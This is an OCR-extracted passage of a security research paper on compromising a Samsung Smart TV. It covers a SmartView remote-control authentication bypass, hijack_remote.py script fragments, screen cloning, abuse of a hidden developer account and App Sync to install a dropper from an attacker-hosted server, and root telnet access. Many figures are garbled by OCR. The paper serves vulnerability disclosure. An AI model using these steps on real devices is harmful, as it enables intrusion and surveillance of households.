32 11:23:15 AM 5/25/2014 — 4.3832965 — SmartView.App.exe 192.168.1.9 192.168.1.19 TCP TCP:Flags-...A...., SrcPort-55000, DstPort=54012, PayloadLen-0, Seq: 
34 11:23:15 AM 5/25/2014 — 4.4070723 — SmartView.App.exe 192.168.1.9 192.168.1.19 TCP TCP:Flags=...AP..., SrcPort- 55000, DstPort=54012, PayloadLen-21, Seg: 
36 11:23:16 AM 5/25/2014 — 4.6075203  SmartView.App.exe 192.168.1.9 192.168.1.19 TCP TCP:[ReTransmit #34]Flags=...AP,.., SrcPort=55000, DstPort=54012, Pay 
37 11:23:16 AM 5/25/2014 4.6075391 SmartView.App.exe 192.168.1.19 ^ 192.168.1.9 TCP — TCP:Flags—...A...., SrcPort=54012, DstPort=55000, PayloadLen-0, Seq=? _ 
E 11:23:22 AM SIS (rnd 12 2467140 SmartMiai Ano axe 19? 168119107 1681 6 ICD. TCD Flan iD SD Santi Ded SSO Dedosdcc Si seo- 

Frame Details x 


DstPort: 55000 


AcknowledgementNumber: 
DataOffset: 80 (0x50) 
Flags: ...AP... 


(Checksum: OxF68D, Good 
UrgentPointer: O (0x0) 
ITCPPayload: SourcePort 


nmm 


SequenceNumber: 3153586140 (OxBBF7E'7 


Window: 4323 (scale factor Ox2) = 17 


[Prot Off: 20 (0x14) Frame Off: 104 (0x68) 


A4 


fi Sel Bytes: 89 


i=} Decode As | BB Width ~ 


3133653412 (C 


= 54012, Dest— 
n | 23) Frame Comments | [=] Hex Details | 


Offset (h) 


00000000 
00000010 


00000020 
00000030 
00000040 
00000050 


* SendBrowserCommand 
* SendMBRIRKey 

* SetAntennaMode 

* SetMainTVChannel 
* SetMainTVSource 

e SetRecordDuration 

* StartCloneView 

* StartInstantRecording 
* StopBrowser 

* StopRecord 

* StopView 


Figure 29: Remote controller authentication packet. 


...iphone..iapp. 

samsungB.d...MTk 
yLjE2OCAxLjE5..M 
TACHMEItQTKCNTCCM 
TItNDg-..Q1JBW11l 
DTOSLSUU- 


Figure 30: Remote controller authentication packet bytes. 


REMOTE CONTROL PROTOCOL 


In addition to SOAP services, the TV provides a remote control 
service on port 55000. The details of the protocol are 
undocumented. Figure 28 shows some of the packets using this 
protocol. The protocol enables the client to send remote 
controller keys over the network, which means that you can 
emulate remote controller key presses from your application on 
a PC or smart phone. 


Design weakness 


There is a design weakness in the authentication process. 
Figure 29 shows an authentication packet from the client. The 
client is sending a message with a proprietary packet format. 
Figure 30 shows the hex representation of the payload bytes for 
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Field Data Format  |Description 
Unknown | 00 Unknown | Unknown 
Length 14 00 Short Length of the following string 
String 69 70 68 6F 6E 65 2E 2E 69 61 70 70 2E 73 61 6D 73 75 6E 67 | String iphone..iapp.samsung 
Payload | 40 00 Short 0x40 bytes of payload 
length 
Unknown | 64 00 Unknown | Unknown 
Length 10 00 Short Length of the following string 
String 4D 54 6B 79 4C 6A 45 32 4F 43 34 78 4C 6A 45 35 Base64 Encoded: MTkyLjE2OCAxLjE5 
string | Decoded: 192.168.1.19 
Length 18 00 Short Length of the following string 
String 4D 54 41 74 4D 45 49 74 51 54 6B 74 4E 54 63 74 4D 54 49 74 | Base4 Encoded: 
4E 44 67 3D string MTAtMEItQTKtNTctMTItNDg- 
Decoded: 10-0B-A9-57-12-48 
Length 10 00 Short Length of the following string 
String 5131 4A 42 57 6C 6C 44 54 30 39 4C 53 55 55 3D Base64 Encoded: QIJBWIIDTO9LSUU= 
string | Decoded: CRAZYCOOKIE 


Table 6: Remote controller authentication packet bytes. 


authentication. Even though the format is not documented, it is 
fairly simple to reverse engineer. 


Table 6 shows the parsed hex bytes from the original packet — 
basically, the client sends the IP address, MAC address and 
hostname to the server. 


When the TV receives this packet, it displays a dialog box 
similar to the one shown in Figure 31. If the user allows the 
connection, then the client is able to send remote controller keys 
over the network. 


Detected a n 


ew devi 
to allow it to evice. Do you want 


access this Product? 


You can ch 
Network > All 
Content Shari 


ange later by Selectin 


Share Settings > 
ing. 


Figure 31: Dialog on the TV. 


The design issue is very obvious here. The information that the 
client uses for authentication is the client’s IP address, MAC 
address and hostname. All of this information can easily be 
retrieved on the local network. The IP address and MAC 
address are constantly being broadcasted through ARP 
packets, and hostnames are sent out through Windows name 
service packets. You do need to figure out which machine is 
allowed access to the TV remote controller service first, or you 
can try all the machines on the network to brute-force 
authentication. At best, this authentication design is pretty 
weak. 


Vulnerability in implementation 


In addition to a fundamental design flaw for remote controller 
authentication, there is also an implementation flaw. According 
to my tests, the hostname and IP address are not even used for 
authentication. The attacker only needs to guess the MAC 
address, which is constantly broadcast over the local network. 


Offset (h) 
oooo0000 
00000010 
00000020 


oo 
01 
73 
Do 


Di 02 O3 04 OS 06 OF 08 09 OA OB OC OD OE OF 
14 00 69 70 68 6F 6E 65 2E 2E 69 61 70 70 2E 


61 6D 73 75 6E 67 08 OO 64 00 OO OO OO 00 


...iphone..iapp. 
O0 samsung..d...... 


Figure 32: Remote controller — all authentication packet bytes. 


encoded ip-b 
encoded mac 
encoded ho 


auth body \ 
(encoded_ip)) \ 


(encoded mac)) \ 


(encoded hostname)) X 


(auth body)) 
auth body 


à J 
auth_s auth_head 
self.sock.send(auth str) 


data self. 
pprint.pprin 


Figure 33: Authentication packet sending routine 


(hijack remote.py). 
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Field Data Format ^ Description 
Unknown | 00 Unknown | Unknown 
Length 14 00 Short Length of the following string 
String 69 70 68 6F 6E 65 2E 2E 69 61 70 70 2E 73 61 6D 73 75 6E 67 | String Ascii: iphone..iapp.samsung 
Payload |08 00 String 0x08 bytes of payload 
length 
Unknown | 64 00 Unknown | Unknown 
Length 00 00 Short Length of the following string 
String Base64 Empty 

string 
Length 00 00 Short Length of the following string 
String Base64 Empty 

string 
Length 00 00 Short Length of the following string 
String Base64 Empty 

string 


Table 7: Remote controller — all authentication packet bytes. 


But there is one more issue: if you send an empty string as a 
MAC address, the server always allows the connection if any 
client was previously allowed for the service. 


Figure 32 shows the hex bytes of the payload that was used for 
authentication bypass. Table 7 shows the parsed hex bytes, and 
you can see that the length fields for IP address, MAC address 
and hostname are all 0 and the strings are empty. 


Figure 33 shows the code that sends this authentication packet. 
From line 18, if you pass an empty string for IP, hostname and 
MAC address, the authentication is bypassed. 


Sending keys 


Now that you can authenticate as a valid SmartView client, you 
need to figure out how to send remote controller keys. For 
example, Figure 34 shows a packet that is sending a key. The 
payload is ‘SOVZX1ZPTFVQ’, which is a base64-encoded 
string of KEY VOLUP'. This key is used for the volume up 
function. 


Figure 35 shows the main code that sends remote controller 
keys. The keys are in the form of strings, and various keys can 
be retrieved from a packet dump of the SmartView sessions. 


Exploiting 


Now that we can send any remote controller keys, we want to 
find out if anyone has previously used the SmartView feature 
and allowed at least one client. 


For example, ‘HOME-PC’ is a legitimate user PC. If a user 
wants to use the SmartView feature, they authenticate the PC 
from the TV screen by allowing the device named ‘HOME-PC’ 
(see Figure 36). 


When a SmartView client is allowed, an access control list is 
added to the ‘Content Sharing’ menu (see Figure 37). 


Now the attacker wants to take control and uses the SmartView 
client from a machine that is connected to the local network. 
Let's assume that they have already gained control of one of the 


Fra... Time Date Local Adjusted Time Offset Process Name Source 

24 11:23:15 AM 5/25/2014 — 3.6147807 — SmartView.App.exe 192.168.1.19 
25 11:23:15 AM 5/25/2014 — 3.6164590 — SmartView.App.exe  192.168.1.19 
26 11:23:15 AM 5/25/2014 — 3.6181050 — SmartView.App.exe 192.168.1.9 
30 11:23:15 AM 5/25/2014 — 4.3801881  SmartView.App.exe 192.168.1.9 
31 11:23:15 AM 5/25/2014 — 4.3820181 —SmartView.App.exe  192.168.1,19 
32 11:23:15 AM 5/25/2014 — 4,3832965 — SmartView.App.exe 192.168.1.9 
34 11:23:15 AM 5/25/2014 — 4.4070723 —SmartView.App.exe 192.168.1.9 
36 11:23:16 AM 5/25/2014 — 4.6075203  SmartView.App.exe 192.168.1.9 
37 11:23:16 AM 5/25/2014 — 4.6075391 — SmartView.App.exe  192.168.1.19 
T: 11:23:23 AM 5/25/2014 12.2467149 SmartView.App.exe 192.168.1.19 
78 11:23:23 AM 5/25/2014 12.2927015 SmartView.App.exe 192.168.1.9 


7a 11:22:22 AM CIENIA — 12 2O27END Smarkiai Ann eve 107 142 1 10 


Destination Pro... Description €: 
192.168.1.9 TCP TCP:Flags- very SrcPort254012, DstPort=55000, PayloadLen-0, Seq=? | 
192.168.1.9 TCP TCP:Flag: „AP... SrcPort=54012, DstPort=55000, PayloadLen=27, Seq: 
192.168.1.19 TCP TCP:Flag: s. SpcPort=55000, DstPort=54012, PayloadLen-0, Seq=? 
192.168.1.19 TCP TCP:Flag: „AP... SrcPort=55000, DstPort=54012, PayloadLen=226, Sec 
192.168.1.9 TCP TCP:Flag: „AP... SrcPort=54012, DstPort=55000, PayloadLen=89, Seq- 
192,168,1,19 TCP jl , SrcPort=55000, DstPort=54012, PayloadLen=0, Seq=? 
192.168.1.19 TCP vay SrcPort=55000, DstPort=54012, PayloadLen=21, Seq- 
192.168.1.19 TCP TCP; [ReTransmit #34]Flags=.. AP... SrcPort=55000, DstPort=54012, Pay 
192.168.1.9 TCP s. SrcPort=54012, DstPort=55000, PayloadLen-0, Seq=: i 
192.168.1.9 TCP , SrcPort=54012, DstPort=55000, PayloadLen-51, Seq: 
192.168.1.19 TCP voy SrcPort- 55000, DstPort=54012, PayloadLen-0, Seq: _ 
10? 14210 ToD TCO:Flane— AD €ecDevk—Ct4nt1? nekDerk-tchnn Davinadi an—141 Cac 


4 M" 


oo 
18 
BB 
oo 
35 
61 


||pooc oo oc oo Sm zm 58 T m ES 2 Ae EJ... 


Prot Off: 0 (0x00) Frame Off: 155 (0x9B) 


DO 08 00 45 00 00 SB SE 
SF CO à8 01 13 CO a8 01 
F7 ES 35 BA C7 C1 B9 50 
00 00 iD 00 69 70 68 6F 6E .bÓ 
35 ee 36 p aa te m o 
6D 75 


Sel Bytes: 12 


sid abe iphon 
61 e.UNSSF6300. 
00 pp.samsung. 


MSOVZX1zP FV 


m 


Frame Details x 

DocPortr 93000 “|| ie} Decode As | B& Width ~ 

SequenceNumber: 3153586229 (OxBBF7EE =— 

AcknowledgementNumber: 3133653433 (C Bsp Aue AA 03:00 
0046 40 00 80 06 

DataOffset: 80 (0x50) 0054 D2 FC D6 D8 

Flegs: iosieRP sit "j|one2 10 DE D6 84 

Window: 4318 (scale factor 0x2) = 17 0070 65 2E 55 ar 

Checksum: 0xD684, Good Ej|oo7E 70 70 2E 

UrgentPointer: O (0x0) 

TCPPayload: SourcePort = 54012, Dest—||9094 

4 m r | 1g Frame Comments 


I] Hex Details | 


Figure 34: Remote controller packets. 
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encoded str 


On uw | 11004 m. 


remote 


remote 
Detected a naw device. Do you want 3 : remote 


remote. ) 
You x 2 
can dee uw icio $e 
Content Sharing. 


Figure 39: Enter key sending code (hijack_remote.py). 


machines on the local network and are trying to get into the TV 
to perform additional attacks. When they try to authenticate the 
machine under their control, a pop-up dialog appears (Figure 
38). 


One click of the enter key is needed for this connection to be 
allowed. The attacker can use the remote controller exploit here. 
Figure 39 shows the code from the hijack_remote.py script that 
bypasses authentication and sends KEY_ENTER to the TV. 


The hijack_remote.py script is run as shown in Figure 40. The 
first argument is the TV’s IP address and the second is the MAC 
address. If you know the MAC address of any device that has 
already been authenticated, you can put that here. However, if 
you put an empty string here, it tries to exploit the empty MAC 
bypass issue. 


ython27\python hijack_remote.py 192.168.1.9 "" 


Figure 40: Running hijack_remote.py. 


When the exploit is successful, the attacker is registered as an 
allowed ‘Content Sharing’ client (see Figure 41). 


LJ 
a 2^ HAS 
Device Name: ATTACKER 


Detected a new device. Do you want 
to allow it to access this product? 


You can change later by selecting 
Network > AllShare Settings > 
Content Sharing. 


mmm oer 


Figure 38: Attacker tries to authenticate. Figure 41: Content sharing access control list. 
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MZ, SmartView - [Samsung LED55] 


Figure 42: SmartView PC application with View. 


Post /smp 4  HTTP/1.0 

HOST: 192.168.1.9:7676 

CONTENT-LENGTH: 301 

CONTENT-TYPE: text/xml;charset-"utf-8" 


USER-AGENT: DLNADOC/1.50 SEC. HHP CRAZYCOOKIE/1. 0 
SOAPACTION: "urn:samsung.com:service:MainTVAgent2 :1éStartCloneVi ew" 


«s:Envelope xmlns:s-"http://schemas. xml soap. org/soap/envelope/" 

s :encodingstyle-"http: //schemas. xmlsoap. org/soap/encoding/"><s :Body»«u:StartCloneview 
xmlns:u-"urn:samsung. com:service:MainTVAgent2:1 '-«ForcedF lag>Normal</For cedF lag><DRMT 
ype»PrivateTZ«/DRMType»«/u:StartCloneView-c/s:Body»«/s:Envelope- 


Figure 43: Screen cloning request. 


HTTP/1.1 200 OK 

Content-Length: 386 

Content-Type: text/xml; charset-"utf-8" 
DATE: Thu, 01 Jan 1970 01:01:09 GMT 
EXT: 

SERVER: UPnP/1.0 

Connection: close 


<s :Body> 
<u:StartcloneviewResponse 


</s:Body> 
«/s:Envelope- 


<?xml version="1.0" encoding-"utf-8"?»«s:Envelope 
xmlns :s="http: //schemas. xmlsoap. org/soap/envelope/" 
s:encodingstyle-"http: //schemas. xmlsoap. org/soap/encoding/"> 


xmlns:u-"urn:samsung. com:service:MainTVAgent2 :1"»«Result»OK«/Result- 
«CloneviewURL-http://192.168.1.9:9090/1livestream/1«/CloneviewURL»«/u:StartCloneviewResponse- 


Figure 44: Screen cloning response. 


INSTALLING A BACKDOOR 


Now we have a way to send any remote controller key to the 
TV. You might think that this glitch isn't all that useful for 
attackers — but imagination is the only limit here. One attack 
scenario we can think of is to change DNS settings in the 
network settings, or possibly to reroute all traffic to the 
attacker's server. Another possibility might be to install malware 
on the TV. From here, we will demonstrate a way in which 
malware can be installed on the TV remotely using a remote 
controller flaw. 


Clone view 


The PC version of the SmartView application supports a 


remote view function in addition to the remote controller 
function (Figure 42). This feature is really useful when 
attacking because the attacker can see the TV screen remotely. 
This could reveal the contents of any app being used, such as 
social apps, or browser and messenger tools like Skype. This 
means that the user's privacy, while using the TV, will be 
compromised. 


This clone view feature is actually implemented through a 
SOAP message and livestream application. The SmartView 
client sends a SOAP message to the smp 4 application using 
the StartCloneView method (Figure 43). If the client has already 
been authenticated through the remote controller service, the 
server starts view cloning and replies with a message that 
contains a URL for streaming (see Figure 44). 
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ITTP/1.0 200 OK 
ontent-type: application/octet-stream 
ache-control: no-cache 


68... ... A... . á. QUA} 
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Figure 46: Livestream response. 


MZ, SmartView - [Samsung LED55] - a | x | 


Figure 47: Log into Samsung account. 


Figure 48: Input ‘develop’ account in email field. 


The client sends a request to the livestream server to retrieve And the server sends out a constant stream of livestream data in 
livestream data (Figure 45). HDCP format (see Figure 46). 
ET /livestream/i HTTP/1.1 Developer account 
User-Agent: Lavf52.104.0 
ccept: */* There are apps for a Samsung TV that can be downloaded from 
dan Aris s x the Samsung app store. To get into the app store you need to log 
Host: 192.168.1.9:9090 in using a Samsung account (see Figure 47). There is a feature 
called a developer account, which is a reserved login name 
Figure 45: Livestream request. called *develop', and if you login with that name, the TV is 
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More Apps 


More Apps 


O"WTmO-8- 
LE KERAG 


»Appc/ 
»usenc/ > 
»«/ » 
»http://192.168.1.19/Widget.zip«/ 


Figure 52: Sample widgetlist.xml. 
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automatically switched to a developer mode (Figure 
48). Creation of the developer account differs for each 
model, but for this F-series TV, the account is already 
created and there is no password associated with it. 


Is p C:\Program Files x86) Apache GroupyApache2WhtdocsXDropper.zipxdataN 


Packed Size Modified Created 
1040850 2013-11-24 15:14 2014-05-28 00:48 


Name Size 


Bm 1040 850 


When you successfully switch the machine to 
developer mode, you get special access to a hidden 
menu. From More Apps, if you check options, it shows 
the ‘IP Setting’ and ‘Start App Sync’ menu items which 
were not shown before (see Figure 49). 


Figure 54: Dropper contents. 


k?xmT version="1.0" encoding="UTF-8"?7> 

krsp stat="ok"> 

«list» 

«widget id="Dropper "> 

<title>Dropper</title> 
<type>user</type> 
«compression size-" 103000" type="zip"/> 
<description></description> 
<download>http://192.168.1.19/Dropper. zip</download> 


By selecting ‘IP Setting’ here, an attacker can input the 
address of a web server that they control (see 
Figure 50). 


After that, the attacker can use the ‘Start App Sync’ _</widget> 
feature to install their malicious app on the machine a 


(see Figure 51). 


Figure 55: Dropper widgetlist.xml. 
App sync & application security issues 


When you choose to start App Sync, the More Apps d C:\Program Files (xX86)VApache Group\Apache2\htdocs\RemoteRooting.zip\ 
program tries to connect to the web server on port 80 Size Packed Size Modified Created 
running on the machine specified by the IP settings. 611 264 2014-05-28 00:48 2014-05-29 00:48 
When it finds a web server on that address, it retrieves a 106 118 98233 2014-05-28 00:48 2014-05-28 00:48 
/widgetlist.xml file and parses it. A sample J JavaScript 9 342 2694 2014-05-28 01:03 2014-05-28 00:48 
widgetlist.xml is shown in Figure 52. The download tag | | \« configxml 804 375 2014-05-29 07:46 2014-05-28 00:48 
specifies the ZIP file that contains the TV app. © index html 337 454 2014-05-23 16:42 2014-05-28 00:48 
Simply reusing the Samygo F-series rooting app and |.) widgetinfo 55 55 2014-05-23 16:38 2014-05-28 00:48 


installing it over App Sync might install a remote shell 
and FTP server, which is enough to demonstrate remote 
compromise through SmartView. But, if you try to 
install the rooting app through the developer account, 
the app will not be installed, and a security warning 
will be displayed (see Figure 53). 


Figure 56: RemoteRooting package contents. 


Figure 57: Package path with installer. 


<list> 


<?xml version-"1.0" encoding-"UTF-8" 7» 
«rsp stat-"ok"» 


«widget id-"RemoteRooting"» 


«title»RemoteRootingc/title» 

«typesuserc/type» 

«compression size="103000" type="zip"/> 
<description></description> 

<download>http: //192.168.1.19/RemoteRoot ing. zip</download> 


<f/widget> 
</list> 
«/rsp» 
Figure 58: RemoteRooting widgetlist.xml. 
Figure 53: Application security issue. Dropper hack 


To investigate more, if you follow the URL given in the error 
message, it describes many different reasons for the security 
warning occurring. One notable fact is that if you embed a binary 
file (ELF in this case), the app is not allowed to install. This is a 
countermeasure to prevent the installation of any unwanted ELF 
binaries on the system. The Samygo rooting app relies on 
replacing a Skype shared library. Even when it is archived in a 
ZIP file, it is still detected by the app installer and rejected. You 
might think of encoding the file, but there is no easy way to 
decode them on the fly from the TV app. The Samygo rooting app 
relies on an Unzip function from the file system plug-in object, so 
there is no room for decoding the contents during the process. 


In order to copy an ELF binary you want to install on the 
system, you need to find a glitch in the app installer's security. 
As it happens, I found one. Even when the app is rejected, the 
whole contents are left in an easily guessable location under / 
mtd rwcommon/common/TempDownLoad. For example, if you 
installed an app called Test, the following folder on the TV 
system would contain the entire contents: 


/mtd_rwcommon/common/TempDownLoad/Test 


Using this fact, we can drop an ELF binary on the system and 
use it later from another app. Even though it triggers a security 
violation error, we can still drop a file we want and use it from 
an app we launch later. 
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More Apps Update Apps : 32 


Update Complete 


More Apps 


Figure 60: Run RemoteRooting app. 


ResrroteRootimg 


——— Setup SamyGO files omm m e n enm reme 


myth rec ommiemvémeos p? er vires Seyre hb Skype wo 2 [o | 
Jenteal rw ommonmosgl engines Sk yp! AoroStant! ? bo | 


vg '/mtd. rwe onem nosp^crugires /Skygre ran amy GO shi ? [58 | 
wg Hd rwcammoni moi enqirves/Siypu/remoteSemyGO zip ? (Ow 1 
*9 "mtd. rw cmimumi common TempDowa ast /Dr opfrer/ dal edpetehi ? | OK 


Al acma Bats ferat cn Cnm necem mro 


Sy ovw nei On opp sr 
ut 

amyGO sh > [o8] 

teSemyGO zp"? [us | 


Sow pressit. nme rexteri TV ther test FTP 


Fremery 1217 Mb tes 


Figure 61: RemoteRooting result. 


# telnet 192.168.1.3 
Iirying 192 16821 2355. 


Figure 62: Access to the TV with root privilege. 


Recently Opened ‘Z| Options 


For example, I packaged the ‘patch’ file inside a dropper app. 
(Figure 54) This file is from the Samygo rooting app and it 
contains multiple ELF binaries. 


The widgetlist.xml file is shown in Figure 55. 


The More Apps installer triggers a security warning but you can 
just dismiss the message. The file we want is now dropped on 
the system. 


Installer 


Now we need to make a new package without any ELF binaries 
(Figure 56). 


One thing we need to do is to change packagePath in Main.js to 
the location where our dropper package is dropped (Figure 57). 


The widgetlist.xml file is shown in Figure 58. 


When you perform app sync, it succeeds without any warning 
(Figure 59). 


You can confirm that the RemoteRooting app just installed on 
the TV system (Figure 60). 


When you launch the app, you see a screen similar to Figure 61. 
Now the Samygo package, including a remote shell and FTP, is 
installed. You can confirm this by connecting to the TV via port 
23. You will have root privilege on the system. (Figure 62) From 
here, further attacks can be launched. 


CONCLUSION 


Smart devices are a new trend in the appliance industry, and 
smart TVs provide a good example of what to expect from 
them. The fact that they can be connected with other devices at 
home, like PCs or smart phones, initially seems very 
convenient. However, the way the overall architecture is 
designed is a little questionable. I used the SmartView feature of 
a Samsung Smart TV to showcase how weak the design of a 
proprietary protocol can be. Also, the actual implementation is 
so delicate that the whole authentication scheme fails when the 
client supplies unexpected input. I also used a weakness in the 
app installer to bypass a security error related to an embedded 
ELF binary. As you have seen, it is possible to install malware 
on the TV using the method I presented here. 


It’s been a while now since the home appliance industry started 
pushing these smart appliances. When these vendors are 
creating new features and developing new technology to support 
them, they might learn some valuable lessons from the past few 
decades of the PC industry. Even when it doesn’t seem likely 
that malware or actual attacks will happen for these smart 
appliances in the foreseeable future, you never know. Better to 
prepare early rather than late. If the new smart appliances don’t 
gain the trust of their users, they won’t ever be used for any 
critical purposes like confidential Skype calls or private social 
networking. The TV already comes with Skype, browser and 
social apps: If the TV can’t give users assurance of its secure 
operation, users will be too ‘smart’ to use it. 
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